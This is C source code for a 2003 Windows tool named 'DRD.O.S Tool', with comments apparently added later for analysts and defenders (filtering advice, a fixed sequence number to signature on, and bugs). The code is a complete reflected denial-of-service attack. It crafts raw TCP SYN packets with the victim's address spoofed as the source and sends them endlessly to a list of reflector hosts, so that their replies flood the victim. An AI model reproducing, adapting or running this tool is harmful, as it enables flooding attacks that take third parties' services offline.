///////////////////////////////////////////////////////
/// DRD.O.S Tool
/// http://www.safechina.net
/// Written by CDrea
/// 2003-01-31
///
/// If u add some function, Please give me a copy
/// mailto: [email protected]
///////////////////////////////////////////////////////
#include <stdio.h>
#include <string.h>
#include <Winsock2.h>
#include <Ws2tcpip.h>
#pragma comment(lib,"ws2_32")
// Size in bytes of the HostName line buffer declared in SendThread().
#define HOST_LEN 15
// TCP sequence number written into every packet. It never changes, so it can
// serve as a matching field when hunting for this tool's traffic in captures.
#define SEQ 0x28376839
// Default TCP destination port, used when argv[3] is absent.
#define TCP_SERVER_PORT 80
// Default TCP source port, used when argv[2] is absent.
#define FAKE_PORT 80
// Exit code passed to ExitProcess() on every fatal error path.
#define STATUS_FAILED 0xFFFF
/*
 * IPv4 header as it is copied byte-for-byte into the outgoing buffer.
 * The code relies on this being 20 bytes with no padding -- presumably true
 * for the original MSVC build; confirm before reusing the layout elsewhere.
 */
typedef struct _iphdr
{
// High nibble: IP version; low nibble: header length in 32-bit words.
unsigned char h_lenver;
unsigned char tos;
// Filled with htons(sizeof(IP_HEADER) + sizeof(TCP_HEADER)) by SendThread().
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
// Source and destination addresses as returned by inet_addr().
unsigned int sourceIP;
unsigned int destIP;
}IP_HEADER, * PIP_HEADER;
/*
 * TCP header without options, copied byte-for-byte after the IP header.
 * Assumed to be 20 bytes with no padding -- confirm for the target compiler.
 */
typedef struct _tcphdr
{
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq;
unsigned int th_ack;
// High nibble: header length in 32-bit words; low nibble left at 0.
unsigned char th_lenres;
// TCP flag bits; SendThread() stores 2 here (the SYN bit).
unsigned char th_flag;
unsigned short th_win;
unsigned short th_sum;
unsigned short th_urp;
}TCP_HEADER, * PTCP_HEADER;
/*
 * File-scope pseudo-header object. SendThread() places it in front of the TCP
 * header before calling checksum() to obtain th_sum.
 * saddr/daddr are unsigned long: 4 bytes each on Windows, 8 on LP64 platforms.
 */
struct
{
unsigned long saddr;
unsigned long daddr;
// Set to 0 by SendThread().
char mbz;
// Protocol number; SendThread() stores IPPROTO_TCP.
char ptcl;
// TCP segment length in network byte order.
unsigned short tcpl;
}psd_header;
// Builds and sends the packets; despite the name it runs on the calling thread.
int SendThread(int argc, char * argv[], char * destIp);
// Prints the banner and command-line synopsis.
void Usage(char *);
// Echoes selected command-line arguments to stdout.
void GetCMD(int argc, char * argv[]);
// 16-bit one's-complement checksum over `size` bytes.
USHORT checksum(USHORT * buffer, int size);
/*
 * Program entry point.
 *
 * Checks that between one and five arguments were supplied, starts Winsock
 * (version 2.1 is requested) and passes the command line to SendThread(),
 * with argv[1] as its third parameter. Every failure path terminates the
 * process through ExitProcess(STATUS_FAILED).
 */
int main(int argc, char * argv[])
{
    WSADATA wsaData;
    int ErrorCode;

    /* Anything outside 2..6 argv entries only prints the synopsis. */
    if (!(argc >= 2 && argc <= 6)) {
        Usage(argv[0]);
        ExitProcess(STATUS_FAILED);
    }

    ErrorCode = WSAStartup(MAKEWORD(2, 1), &wsaData);
    if (ErrorCode != 0) {
        fprintf(stderr, "WSAStartup failed: %d\n", ErrorCode);
        ExitProcess(STATUS_FAILED);
    }

    ErrorCode = SendThread(argc, argv, argv[1]);
    if (ErrorCode == 0)
        return 0;

    fprintf(stderr, "Thread failed: %d\n", ErrorCode);
    ExitProcess(STATUS_FAILED);
    return 0;
}
/*
 * SendThread - build one IPv4+TCP header pair and send it through a raw socket
 * (IP_HDRINCL) to every address listed in "iplist.txt", one address per line.
 *
 * argc/argv  process command line; argv[2] and argv[3] are parsed with atoi().
 * destIP     dotted-quad string (main() passes argv[1]). It is written into
 *            the IP *source* field, not the destination.
 *
 * Returns -1 when iplist.txt cannot be opened. Socket creation or IP_HDRINCL
 * failures end the process via ExitProcess(). The send loop is while(1) with
 * no break, so the trailing `return 0` is reached only through the __leave
 * taken when SO_SNDTIMEO cannot be set.
 *
 * Notes for analysts and defenders:
 *  - Every packet is a bare SYN whose source address is the destIP argument,
 *    so whatever the listed hosts answer is addressed to that third party.
 *    This is the reflection pattern the file header names.
 *  - Source-address validation at the network edge (BCP 38 / RFC 2827) drops
 *    such packets before they leave the sender's network.
 *  - Microsoft's raw-socket documentation states that Windows XP SP2 and later
 *    client releases refuse to send TCP data over raw sockets; the code dates
 *    from 2003 and presumably predates that restriction.
 *  - The sequence number (SEQ), ident, ttl 128, window 16384 and the 20-byte
 *    option-less TCP header are identical in every packet, which makes the
 *    traffic straightforward to signature.
 */
int SendThread(int argc, char * argv[], char * destIP)
{
int TimeOut=2000, ErrorCode, flag, i=0;
char SendBuff[128];
// Holds one line of iplist.txt. NOTE(review): the index i used to fill it is
// never compared against HOST_LEN anywhere in this function.
char HostName[HOST_LEN];
char ch;
FILE * fp;
SOCKET SendSock;
struct sockaddr_in DestAddr;
IP_HEADER IpHeader;
TCP_HEADER TcpHeader;
// The address list is read from the current working directory.
if((fp=fopen("iplist.txt", "r")) == NULL)
{
printf("Error: File not found!\n");
return -1;
}
// Raw IP socket: the caller supplies the complete IP header (see IP_HDRINCL below).
SendSock = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED);
if(SendSock == INVALID_SOCKET)
{
fprintf(stderr, "socket failed: %d\n", GetLastError());
ExitProcess(STATUS_FAILED);
}
flag = true;
ErrorCode = setsockopt(SendSock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(int));
if(ErrorCode == SOCKET_ERROR)
{
fprintf(stderr, "set IP_HDRINCL failed: %d\n", GetLastError());
ExitProcess(STATUS_FAILED);
}
__try
{
// With five or more argv entries the send timeout is taken from argv[3],
// the same argument that supplies the destination port below.
if(argc > 4)
TimeOut = atoi(argv[3]);
ErrorCode = setsockopt(SendSock, SOL_SOCKET, SO_SNDTIMEO, (char *)&TimeOut,
sizeof(TimeOut));
if(ErrorCode == SOCKET_ERROR)
{
fprintf(stderr, "set TimeOut failed: %d\n", GetLastError());
__leave;
}
DestAddr.sin_family = AF_INET;
// DestAddr.sin_addr.s_addr = inet_addr(SERVER);
if(argc > 3)
DestAddr.sin_port = htons(atoi(argv[3]));
else
DestAddr.sin_port = htons(TCP_SERVER_PORT);
// Version 4 in the high nibble; header length in 32-bit words in the low nibble
// (assumes sizeof(unsigned long) == 4, as on Windows).
IpHeader.h_lenver = (4<<4 | sizeof(IpHeader)/sizeof(unsigned long));
IpHeader.tos = 0;
IpHeader.total_len = htons(sizeof(IP_HEADER) + sizeof(TCP_HEADER));
// Stored without htons(), unlike total_len.
IpHeader.ident = 1;
IpHeader.frag_and_flags = 0;
IpHeader.ttl = 128;
IpHeader.proto = IPPROTO_TCP;
IpHeader.checksum = 0;
// The source field is set to the destIP argument rather than a local address.
IpHeader.sourceIP = inet_addr(destIP);
// Placeholder; replaced per list entry inside the loop.
IpHeader.destIP = inet_addr("0.0.0.0");
if(argc > 2)
TcpHeader.th_sport = htons(atoi(argv[2]));
else
TcpHeader.th_sport = htons(FAKE_PORT);
if(argc > 3)
TcpHeader.th_dport = htons(atoi(argv[3]));
else
TcpHeader.th_dport = htons(TCP_SERVER_PORT);
TcpHeader.th_seq = htonl(SEQ);
TcpHeader.th_ack = 0;
// Header length in 32-bit words, shifted into the high nibble.
TcpHeader.th_lenres = (sizeof(TCP_HEADER)/4<<4|0);
// 2 == SYN bit only.
TcpHeader.th_flag = 2;
TcpHeader.th_win = htons(16384);
TcpHeader.th_urp = 0;
TcpHeader.th_sum = 0;
// Pseudo-header fields used only for the TCP checksum calculation.
psd_header.saddr = IpHeader.sourceIP;
psd_header.daddr = IpHeader.destIP;
psd_header.mbz = 0;
psd_header.ptcl = IPPROTO_TCP;
psd_header.tcpl = htons(sizeof(TCP_HEADER));
/* memcpy(SendBuff, &psd_header, sizeof(psd_header));
memcpy(SendBuff+sizeof(psd_header), &TcpHeader, sizeof(TCP_HEADER));
TcpHeader.th_sum = checksum((USHORT *)SendBuff, sizeof(psd_header)+sizeof(TcpHeader));
memcpy(SendBuff, &IpHeader, sizeof(IP_HEADER));
memcpy(SendBuff+sizeof(IP_HEADER), &TcpHeader, sizeof(TCP_HEADER));
memset(SendBuff+sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0, 4);
IpHeader.checksum = checksum((USHORT *)SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER));
memcpy(SendBuff, &IpHeader, sizeof(IP_HEADER));
memcpy(SendBuff+sizeof(TCP_HEADER), &TcpHeader, sizeof(TCP_HEADER)); */
printf("Send Packets\n");
int Packets = 0;
ch = fgetc(fp);
GetCMD(argc, argv);
// The list file is consumed one character at a time. There is no exit
// condition: the process keeps sending until it is terminated externally.
while(1)
{
// A newline or end-of-file completes one list entry.
if(ch == '\n' || ch == EOF)
{
HostName[i] = '\0';
// Add your code here-----------------------
DestAddr.sin_addr.s_addr = inet_addr(HostName);
IpHeader.destIP = inet_addr(HostName);
IpHeader.checksum = 0;
psd_header.daddr = IpHeader.destIP;
TcpHeader.th_seq = htonl(SEQ);
TcpHeader.th_sum = 0;
// TCP checksum: pseudo-header followed by the TCP header, staged in SendBuff.
memcpy(SendBuff, &psd_header, sizeof(psd_header));
memcpy(SendBuff+sizeof(psd_header), &TcpHeader, sizeof(TCP_HEADER));
TcpHeader.th_sum = checksum((USHORT *)SendBuff, sizeof(psd_header)+sizeof(TcpHeader));
// SendBuff is then overwritten with the IP header followed by the TCP header.
memcpy(SendBuff, &IpHeader, sizeof(IP_HEADER));
memcpy(SendBuff+sizeof(IP_HEADER), &TcpHeader, sizeof(TCP_HEADER));
memset(SendBuff+sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0, 4);
// checksum() is run over both headers as they sit in SendBuff.
IpHeader.checksum = checksum((USHORT *)SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER));
memcpy(SendBuff, &IpHeader, sizeof(IP_HEADER));
memcpy(SendBuff+sizeof(TCP_HEADER), &TcpHeader, sizeof(TCP_HEADER));
// Progress output: one '.' each time the counter reaches 10240.
Packets++;
if(Packets == 10240)
{
printf(".");
Packets = 1;
}
// The result is stored in ErrorCode but never inspected.
ErrorCode = sendto(SendSock, SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0,
(struct sockaddr *)&DestAddr, sizeof(DestAddr));
// printf("->%s\n", HostName);
//----------------------------
i = 0;
ch = fgetc(fp);
// At end-of-file the stream is rewound, so the list is replayed indefinitely.
if(ch == EOF)
{
// i = 0;
rewind(fp);
// memset(HostName, 0, sizeof(HostName));
}
}
HostName[i] = ch;
i++;
ch = fgetc(fp);
}
}
__finally
{
// As written, closesocket() runs only when SendSock equals INVALID_SOCKET.
if(SendSock == INVALID_SOCKET)
closesocket(SendSock);
WSACleanup();
}
return 0;
}
/*
 * One's-complement checksum in the style of RFC 1071.
 *
 * buffer  start of the data, read as 16-bit words in host byte order
 * size    number of bytes to cover; a trailing odd byte is added as-is
 *
 * Returns the bitwise complement of the folded 16-bit sum.
 */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long sum = 0;
    USHORT *word = buffer;
    int remaining;

    /* Accumulate whole 16-bit words. */
    for (remaining = size; remaining > 1; remaining -= sizeof(USHORT)) {
        sum += *word;
        word++;
    }

    /* Any leftover contributes its first byte. */
    if (remaining != 0) {
        sum += *(UCHAR *)word;
    }

    /* Fold the carries back into the low 16 bits, twice. */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);

    return (USHORT)(~sum);
}
/*
 * Print the tool banner, the command-line synopsis and four example
 * invocations to stdout.
 *
 * msg  program name substituted into the synopsis (main() passes argv[0])
 */
void Usage(char * msg)
{
    /* The fixed banner and heading go out in a single call. */
    printf("+-----------------------------+\n"
           "| DRD.O.S Tool v0.3 |\n"
           "| |\n"
           "| http://www.safechina.net |\n"
           "+-----------------------------+\n"
           "USAGE:\n");

    printf(" %s DestIP [DestPort] [TcpServerPort] [TimeOut]\n", msg);

    printf("EXAMPLE:\n");
    printf(" %s 192.168.0.1\n", msg);
    printf(" %s 192.168.0.1 80\n", msg);
    printf(" %s 192.168.0.1 80 170 \n", msg);
    printf(" %s 192.168.0.1 80 170 2000\n", msg);
}
/*
 * Echo the command-line arguments to stdout between two separator lines.
 *
 * The labels are attached to argv[2]..argv[5]. Anyone reading captured console
 * output should map them through SendThread(), which takes the spoofed source
 * address from argv[1], the TCP source port from argv[2] and the destination
 * port from argv[3]; argv[4] and argv[5] are only printed here.
 */
void GetCMD(int argc, char * argv[])
{
printf("<------------------------>\n");
// Printed unconditionally; main() admits argc == 2, where argv[2] is NULL.
printf(" Target: %s\n", argv[2]);
if(argc > 3)
printf(" Target Port: %d\n", atoi(argv[3]));
if(argc > 4)
printf(" TCP Server Port: %d\n", atoi(argv[4]));
if(argc > 5)
printf(" Timeout: %d\n", atoi(argv[5]));
printf("<------------------------>\n");
}